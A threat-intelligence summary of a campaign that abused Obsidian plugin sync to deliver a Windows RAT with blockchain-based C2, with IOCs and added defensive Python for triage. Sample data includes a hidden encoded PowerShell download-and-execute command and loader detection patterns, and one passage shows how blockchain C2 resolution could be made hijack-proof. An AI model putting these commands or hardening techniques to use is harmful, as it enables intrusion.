Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT

Elastic Security Labs tracked REF6598, a targeted social-engineering campaign that abused Obsidian’s community plugin sync to execute a cross-platform intrusion chain culminating in a novel Windows RAT named PHANTOMPULSE with blockchain-based C2 resolution. The campaign used LinkedIn/Telegram lures, trojanized Obsidian Shell Commands and Hider plugins for initial access, an in-memory loader called PHANTOMPULL on Windows, and an obfuscated AppleScript dropper with Telegram fallback on macOS. #PHANTOMPULSE #Obsidian

Keypoints

  • REF6598 used targeted social engineering on LinkedIn and Telegram to convince victims to log into an attacker-controlled Obsidian cloud vault and enable community plugin sync.
  • The initial access vector abused legitimate Obsidian community plugins (Shell Commands and Hider) to trigger silent command execution when a synced vault was opened.
  • Windows chain: Shell Commands triggered PowerShell that downloaded a staged loader (syncobs.exe/PHANTOMPULL) which decrypts and reflectively loads PHANTOMPULSE entirely in memory.
  • PHANTOMPULSE is a feature-rich, AI-assisted Windows RAT with advanced in-memory injection (module stomping), extensive telemetry, and a decentralized C2 resolution via on-chain Ethereum transaction data.
  • macOS chain: obfuscated AppleScript dropper persisted via a LaunchAgent and uses a layered C2 resolution (domains + Telegram dead-drop) with direct osascript execution of staged code.
  • Operators rotated C2 by encoding URLs into blockchain transaction calldata, but the design can be hijacked because the malware accepts the most-recent transaction for C2 without verifying sender authenticity.
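The last keypoint is the one a defender can act on: because the implant takes the newest transaction touching the wallet and never checks who sent it, anyone who can get a transaction onto the chain can redirect it. The following is an added example, not code from the Elastic write-up or from the malware, showing the naive most-recent-transaction resolver beside a variant that only trusts transactions signed by the operator's key. It assumes the URL sits in the calldata as plain UTF-8 bytes (the page says only that URLs were encoded into calldata); the addresses, block numbers and URLs are constructed placeholders, not the wallets or domains from the IOC list.

```python
"""Resolve a C2 URL from Ethereum transaction calldata: the implant's
most-recent-transaction logic beside a sender-checked variant.
Example code; the calldata encoding (plain UTF-8) is an assumption."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Tx:
    block_number: int
    sender: str       # the transaction's "from" address (recovered from its signature)
    input_data: str   # calldata as 0x-prefixed hex


def encode_calldata(url: str) -> str:
    """Operator side: place a URL into calldata as UTF-8 bytes (assumed encoding)."""
    return "0x" + url.encode("utf-8").hex()


def decode_calldata(input_data: str):
    """Implant side: turn calldata back into a URL; None if it is not valid text."""
    try:
        return bytes.fromhex(input_data.removeprefix("0x")).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def resolve_c2_naive(txs):
    """The design the page describes: newest transaction wins, sender never checked."""
    if not txs:
        return None
    newest = max(txs, key=lambda t: t.block_number)
    return decode_calldata(newest.input_data)


def resolve_c2_checked(txs, operator_address):
    """Same lookup, but only transactions whose sender is the operator count.
    The sender field is derived from the transaction signature, so this is an
    authenticity check, not just a string comparison."""
    mine = [t for t in txs if t.sender.lower() == operator_address.lower()]
    if not mine:
        return None
    newest = max(mine, key=lambda t: t.block_number)
    return decode_calldata(newest.input_data)


# Constructed sample: two operator rotations followed by a later transaction
# from an unrelated party. Placeholder addresses and hosts, not real IOCs.
OPERATOR = "0x00000000000000000000000000000000000000aa"
HIJACKER = "0x00000000000000000000000000000000000000bb"
SAMPLE_TXS = [
    Tx(100, OPERATOR, encode_calldata("https://c2-one.example.invalid/")),
    Tx(150, OPERATOR, encode_calldata("https://c2-two.example.invalid/")),
    Tx(200, HIJACKER, encode_calldata("https://sinkhole.example.invalid/")),
]

if __name__ == "__main__":
    print("naive  :", resolve_c2_naive(SAMPLE_TXS))
    print("checked:", resolve_c2_checked(SAMPLE_TXS, OPERATOR))
```

Run as written, the naive resolver follows the third transaction to the sinkhole host while the checked variant still returns the operator's second URL. That gap is exactly the hijack window the keypoint describes: a defender who can fund one transaction to the resolution wallet can point every live implant at a sinkhole, and an operator who wanted to close it would have to bind the URL to a key the implant already trusts.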

MITRE Techniques

  • [T1566] Phishing – Social engineering over LinkedIn and Telegram was used to lure targets into opening the attacker-controlled Obsidian vault and enabling plugin sync (‘The threat actors operate under the guise of a venture capital firm, initiating contact with targets through LinkedIn…the conversation moves to a Telegram group’).
  • [T1059] Command and Scripting Interpreter – PowerShell and AppleScript were used to bootstrap and execute staged payloads on Windows and macOS (‘suspicious PowerShell execution with Obsidian as the parent process’; ‘the Shell commands plugin’s macOS command executes a Base64-encoded payload through osascript’).
  • [T1547] Boot or Logon Autostart Execution – macOS persistence was achieved by creating a LaunchAgent plist that runs the second-stage dropper at login (‘Creates a persistent LaunchAgent plist at ~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist configured with KeepAlive and RunAtLoad set to true’).
  • [T1055] Process Injection – The Windows loader and RAT perform reflective in-memory loading and injection techniques including module stomping, so the final payload never touches disk (‘reflectively loads payloads entirely in memory’ and ‘advanced process injection via module stomping’).
  • [T1071] Application Layer Protocol – PHANTOMPULSE communicates with its C2 over HTTPS using WinHTTP and a fixed set of API endpoints for telemetry, tasking, uploads, and results (‘PHANTOMPULSE uses WinHTTP for C2 communication… /v1/telemetry/report POST’).
  • [T1548] Abuse Elevation Control Mechanism – The RAT carries a privilege-escalation command that uses the COM elevation moniker, the auto-elevation mechanism behind the UAC-bypass sub-technique T1548.002 (‘Escalate to SYSTEM via COM elevation moniker’).
  • [T1056] Input Capture (Keylogging) – The RAT includes a keylogger and a dedicated C2 endpoint for keylog uploads (‘/v1/telemetry/keylog POST – Keylog data upload’; ‘keylog – Start/stop keylogger’).
  • [T1113] Screen Capture – The RAT can capture and upload screenshots to the C2 (‘screenshot – Capture and upload a screenshot’; ‘/v1/telemetry/upload POST – Screenshot/file upload’).
  • [T1041] Exfiltration Over C2 Channel – Collected data (screenshots, keylogs, command results) is uploaded to operator-controlled endpoints over the same C2 channel (‘/v1/telemetry/upload POST – Screenshot/file upload’ and ‘/v1/telemetry/result POST – Command result delivery’).
  • [T1199] Trusted Relationship – The adversary abused Obsidian’s legitimate plugin ecosystem and the signed Obsidian client so that a plugin sync the user enabled themselves executed attacker-controlled commands (‘abuses Obsidian’s legitimate community plugin ecosystem, specifically the Shell Commands and Hider plugins’).
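The T1059 and T1199 entries both come down to one artifact: a Shell Commands plugin configuration that fires a command automatically when the synced vault opens. What follows is an added triage example, not code from the Elastic write-up or from the plugin, that walks a data.json, flags commands bound to an auto-trigger event or containing loader-style indicators (hidden PowerShell windows, -EncodedCommand, osascript, base64 decoding), and decodes any PowerShell -EncodedCommand argument so the analyst sees the plaintext stage. The field names (shell_commands, platform_specific_commands, events, the after-vault-opening event) are assumptions about the plugin's settings layout and should be checked against a real install; the sample config, hostnames and command lines are constructed.

```python
"""Triage an Obsidian Shell Commands plugin data.json for commands that run
automatically on vault open and look like staged loaders.
Example code; plugin field names are assumptions, sample config is constructed."""
import base64
import json
import re

# Constructed sample in the layout assumed for
# .obsidian/plugins/obsidian-shellcommands/data.json. Hosts are placeholders.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/tt.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_DATA_JSON = json.dumps({
    "shell_commands": [
        {
            "id": "sync-cmd",
            "platform_specific_commands": {
                "default": "git pull",
                "win32": f"powershell -w hidden -enc {_ENCODED}",
                "darwin": "echo c2F5IGhp | base64 -d | osascript -",
            },
            # assumed event name for "run when the vault is opened"
            "events": {"after-vault-opening": {"enabled": True}},
        },
        {
            "id": "note-date",
            "platform_specific_commands": {"default": "date"},
            "events": {},
        },
    ]
})

# Loader-style indicators seen across the Windows and macOS chains on this page.
SUSPICIOUS = [re.compile(p, re.I) for p in (
    r"\bpowershell\b",
    r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",   # -EncodedCommand payload
    r"-w(?:indowstyle)?\s+hidden",
    r"\bosascript\b",
    r"\bbase64\b",
    r"\biex\b|invoke-expression",
    r"downloadstring|invoke-webrequest|\bcurl\b|\bwget\b",
    r"\$env:temp",
)]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_shell_commands(data_json_text: str):
    """One finding per (command, platform) that is auto-triggered or suspicious.
    high = suspicious and auto-triggered, medium = suspicious only,
    low = auto-triggered only (anything that runs on vault open deserves a look)."""
    cfg = json.loads(data_json_text)
    findings = []
    for cmd in cfg.get("shell_commands", []):
        auto = sorted(name for name, ev in cmd.get("events", {}).items()
                      if isinstance(ev, dict) and ev.get("enabled"))
        for platform, line in cmd.get("platform_specific_commands", {}).items():
            hits = [p.pattern for p in SUSPICIOUS if p.search(line)]
            if not hits and not auto:
                continue
            severity = "high" if hits and auto else ("medium" if hits else "low")
            findings.append({
                "id": cmd.get("id"), "platform": platform, "severity": severity,
                "auto_trigger": auto, "indicators": hits, "command": line,
                "decoded": decode_encoded_command(line),
            })
    return findings


if __name__ == "__main__":
    for f in scan_shell_commands(SAMPLE_DATA_JSON):
        print(f["severity"], f["id"], f["platform"], f["auto_trigger"], f["indicators"])
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run against a synced vault's data.json on a suspect host, the scan gives the analyst the per-platform commands, whether they were wired to an auto-trigger, and the decoded PowerShell stage, which is what the ‘Obsidian as the parent process’ hunt above will show only as an opaque encoded command line. The benign second entry produces no finding, and the benign default command of the first entry is reported at low severity purely because it runs on vault open.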

Indicators of Compromise

  • [SHA-256 ] Staged loader and final payload – 70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980 (syncobs.exe / PHANTOMPULL), 33dacf9f854f636216e5062ca252df8e5bed652efd78b86512f5b868b11ee70f (PHANTOMPULSE)
  • [IPv4 address ] Payload staging server – 195.3.222[.]251 (PowerShell script and loader delivery)
  • [domain-name ] C2 and drop domains – panel.fefea22134[.]net (PhantomPulse C2 panel), 0x666[.]info (macOS dropper C2)
  • [URL ] macOS Telegram fallback – t[.]me/ax03bot (Telegram channel used as a fallback dead-drop for C2)
  • [crypto-wallet ] Blockchain C2 resolution wallet – 0xc117688c530b660e15085bF3A2B664117d8672aA (wallet used to encode C2 in transaction input); 0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E (funding wallet)
  • [file name ] Observed file artifacts and script names – syncobs.exe (PHANTOMPULL loader), $env:TEMP\tt.ps1 (downloaded PowerShell stage), and .obsidian/plugins/obsidian-shellcommands/data.json (malicious Shell Commands configuration)


Read more: https://www.elastic.co/security-labs/phantom-in-the-vault